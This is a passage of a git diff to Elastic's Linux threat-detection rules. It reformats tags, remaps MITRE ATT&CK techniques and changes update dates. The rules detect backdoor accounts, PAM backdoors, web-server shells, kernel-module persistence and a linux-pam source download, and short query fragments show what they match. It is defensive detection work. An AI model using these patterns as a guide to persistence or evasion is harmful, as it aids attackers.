guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -172,14 +182,22 @@ process.name : "kworker*" and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.004" -name = "Masquerade Task or Service" -reference = "https://attack.mitre.org/techniques/T1036/004/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/persistence_linux_backdoor_user_creation.toml b/rules/linux/persistence_linux_backdoor_user_creation.toml index 42c38c10005..fde1a2aa627 100644 --- a/rules/linux/persistence_linux_backdoor_user_creation.toml +++ b/rules/linux/persistence_linux_backdoor_user_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -122,7 +122,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -136,24 +147,16 @@ process.args in ("-o", "--non-unique") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[[rule.threat.technique.subtechnique]] +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_linux_group_creation.toml b/rules/linux/persistence_linux_group_creation.toml index f7dfdc918b0..1a5ec523679 100644 --- a/rules/linux/persistence_linux_group_creation.toml +++ b/rules/linux/persistence_linux_group_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -103,7 +103,13 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -114,34 +120,16 @@ iam where host.os.type == "linux" and event.type == "group" and event.type == "c framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" [[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_linux_shell_activity_via_web_server.toml b/rules/linux/persistence_linux_shell_activity_via_web_server.toml index a496f455970..e3267bc31b1 100644 --- a/rules/linux/persistence_linux_shell_activity_via_web_server.toml +++ b/rules/linux/persistence_linux_shell_activity_via_web_server.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -179,19 +179,6 @@ process where host.os.type == "linux" and event.type == "start" and process.pare [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" @@ -206,3 +193,16 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/persistence_linux_user_added_to_privileged_group.toml b/rules/linux/persistence_linux_user_added_to_privileged_group.toml index 001f3e1a015..10ff2785c87 100644 --- a/rules/linux/persistence_linux_user_added_to_privileged_group.toml +++ b/rules/linux/persistence_linux_user_added_to_privileged_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -114,7 +114,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -133,34 +144,16 @@ process.executable != null and process.args in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" [[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_lkm_configuration_file_creation.toml b/rules/linux/persistence_lkm_configuration_file_creation.toml index f939a674b6d..4bf0c7baf4b 100644 --- a/rules/linux/persistence_lkm_configuration_file_creation.toml +++ b/rules/linux/persistence_lkm_configuration_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -54,7 +54,15 @@ Loadable Kernel Modules (LKMs) are components that can be dynamically loaded int risk_score = 47 rule_id = "6e2355cc-c60a-4d92-a80c-e54a45ad2400" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -113,3 +121,16 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_manual_dracut_execution.toml b/rules/linux/persistence_manual_dracut_execution.toml index 71052803c71..0afee6bda3f 100644 --- a/rules/linux/persistence_manual_dracut_execution.toml +++ b/rules/linux/persistence_manual_dracut_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -82,7 +82,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -114,3 +125,21 @@ reference = "https://attack.mitre.org/techniques/T1542/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_message_of_the_day_creation.toml b/rules/linux/persistence_message_of_the_day_creation.toml index 5caeea7b41d..32d08cc31f9 100644 --- a/rules/linux/persistence_message_of_the_day_creation.toml +++ b/rules/linux/persistence_message_of_the_day_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -179,11 +179,6 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.001" -name = "Logon Script (Windows)" -reference = "https://attack.mitre.org/techniques/T1037/001/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_message_of_the_day_execution.toml b/rules/linux/persistence_message_of_the_day_execution.toml index e685a469553..4e5c181f2dd 100644 --- a/rules/linux/persistence_message_of_the_day_execution.toml +++ b/rules/linux/persistence_message_of_the_day_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -205,11 +205,6 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.001" -name = "Logon Script (Windows)" -reference = "https://attack.mitre.org/techniques/T1037/001/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_network_manager_dispatcher_persistence.toml b/rules/linux/persistence_network_manager_dispatcher_persistence.toml index 5e52842ddea..089f1d5d144 100644 --- a/rules/linux/persistence_network_manager_dispatcher_persistence.toml +++ b/rules/linux/persistence_network_manager_dispatcher_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -79,7 +79,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,11 +126,42 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_openssl_passwd_hash_generation.toml b/rules/linux/persistence_openssl_passwd_hash_generation.toml index f8e54f5938d..dc7660861c7 100644 --- a/rules/linux/persistence_openssl_passwd_hash_generation.toml +++ b/rules/linux/persistence_openssl_passwd_hash_generation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -111,11 +111,6 @@ not process.args in ("-help", "--help", "-h") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation.toml b/rules/linux/persistence_pluggable_authentication_module_creation.toml index 231a8a31bd3..a5bebae77f2 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -119,19 +119,14 @@ file where host.os.type == "linux" and event.action == "creation" and process.ex framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -141,12 +136,7 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml index d4ef01be97c..2505889ddd7 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -101,19 +101,14 @@ file where host.os.type == "linux" and event.type == "creation" and file.name li framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -123,12 +118,7 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml index 03bf5554379..57331335bcc 100644 --- a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml +++ b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -65,7 +65,15 @@ references = [ risk_score = 47 rule_id = "96f29282-ffcc-4ce7-834b-b17aee905568" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by process.entity_id with maxspan=3s @@ -98,16 +106,24 @@ sequence by process.entity_id with maxspan=3s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.003" -name = "Pluggable Authentication Modules" -reference = "https://attack.mitre.org/techniques/T1556/003/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_pluggable_authentication_module_source_download.toml b/rules/linux/persistence_pluggable_authentication_module_source_download.toml index 974af680518..458326e408c 100644 --- a/rules/linux/persistence_pluggable_authentication_module_source_download.toml +++ b/rules/linux/persistence_pluggable_authentication_module_source_download.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -62,7 +62,17 @@ references = [ risk_score = 47 rule_id = "53ef31ea-1f8a-493b-9614-df23d8277232" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -75,11 +85,24 @@ process.args like~ "https://github.com/linux-pam/linux-pam/releases/download/v*/ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_polkit_policy_creation.toml b/rules/linux/persistence_polkit_policy_creation.toml index 705ed474e08..0735fde6ca8 100644 --- a/rules/linux/persistence_polkit_policy_creation.toml +++ b/rules/linux/persistence_polkit_policy_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -54,7 +54,17 @@ Polkit, or PolicyKit, is a system service in Linux environments that manages sys risk_score = 21 rule_id = "0f54e947-9ab3-4dff-9e8d-fb42493eaa2f" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -100,11 +110,24 @@ file.extension in ("rules", "pkla", "policy") and file.path like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml index fc9be420d9d..ada832ab5a8 100644 --- a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml +++ b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -145,16 +145,6 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.017" -name = "Udev Rules" -reference = "https://attack.mitre.org/techniques/T1546/017/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" diff --git a/rules/linux/persistence_process_capability_set_via_setcap.toml b/rules/linux/persistence_process_capability_set_via_setcap.toml index a915555bf2b..412be59834c 100644 --- a/rules/linux/persistence_process_capability_set_via_setcap.toml +++ b/rules/linux/persistence_process_capability_set_via_setcap.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -79,7 +79,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -100,10 +110,13 @@ process.name == "setcap" and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/persistence_pth_file_creation.toml b/rules/linux/persistence_pth_file_creation.toml index 78290a1d91f..8492cf01914 100644 --- a/rules/linux/persistence_pth_file_creation.toml +++ b/rules/linux/persistence_pth_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -85,7 +85,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" 